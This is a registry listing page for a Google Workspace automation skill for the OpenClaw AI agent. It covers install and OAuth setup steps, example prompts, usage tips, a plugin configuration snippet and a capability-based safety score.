ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 3/5

google-workspace

Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.

Why use this skill?

Automate Gmail, Calendar, Sheets, and Docs with the OpenClaw google-workspace skill. Manage your workflow efficiently with AI-driven task management.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/google-workspace-ndlt1
Or

What This Skill Does

The google-workspace skill provides a robust bridge between the OpenClaw AI agent and the Google Workspace ecosystem. It empowers users to automate administrative tasks across Gmail, Google Calendar, Google Contacts, Google Sheets, and Google Docs. By leveraging the Google APIs, this skill allows the agent to read and send emails, manage complex scheduling, manipulate spreadsheet data, and generate collaborative documents, effectively acting as a personal administrative assistant.

Installation

To begin, ensure you have the openclaw-agent utility installed on your host system (Windows or macOS) as specified in the official documentation. Once the agent is active, install the skill via your terminal using: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-ndlt1. Following installation, you must configure your Google Cloud Project. Enable the relevant APIs in the Google Cloud Console, download your credentials.json, and ensure the google_auth.py helper script is present in your working directory to handle OAuth 2.0 token management securely.

Use Cases

This skill is ideal for professionals looking to minimize context switching between web apps. Common use cases include: summarizing recent email threads into a daily digest, automatically logging meeting details from emails directly into Google Calendar, preparing meeting agenda documents in Docs, or extracting data from Sheets to generate automated reports. It serves as a powerful utility for developers who need to bridge AI logic with their everyday business communication tools.

Example Prompts

  1. "Check my Gmail for any unread emails from my manager today and summarize the action items for me."
  2. "Look at my calendar for next Tuesday and add a 30-minute block for project planning at 2 PM."
  3. "Open the Q3 Sales tracker sheet and calculate the total revenue from the 'Sales' column, then draft a summary doc."

Tips & Limitations

Note that the first execution of this skill will trigger a browser window for OAuth consent; ensure your environment supports local server redirection. For security, never share your token.pickle file, as it contains sensitive authorization tokens. Be aware of Google's API rate limits if performing bulk operations like reading thousands of emails or writing extensive rows to a spreadsheet, as excessive automation might trigger temporary throttling.

Metadata

Stars2387
Views2
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-google-workspace-ndlt1": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#productivity#automation#google-workspace#email#api
Safety Score: 3/5

Flags: network-access, file-read, external-api, code-execution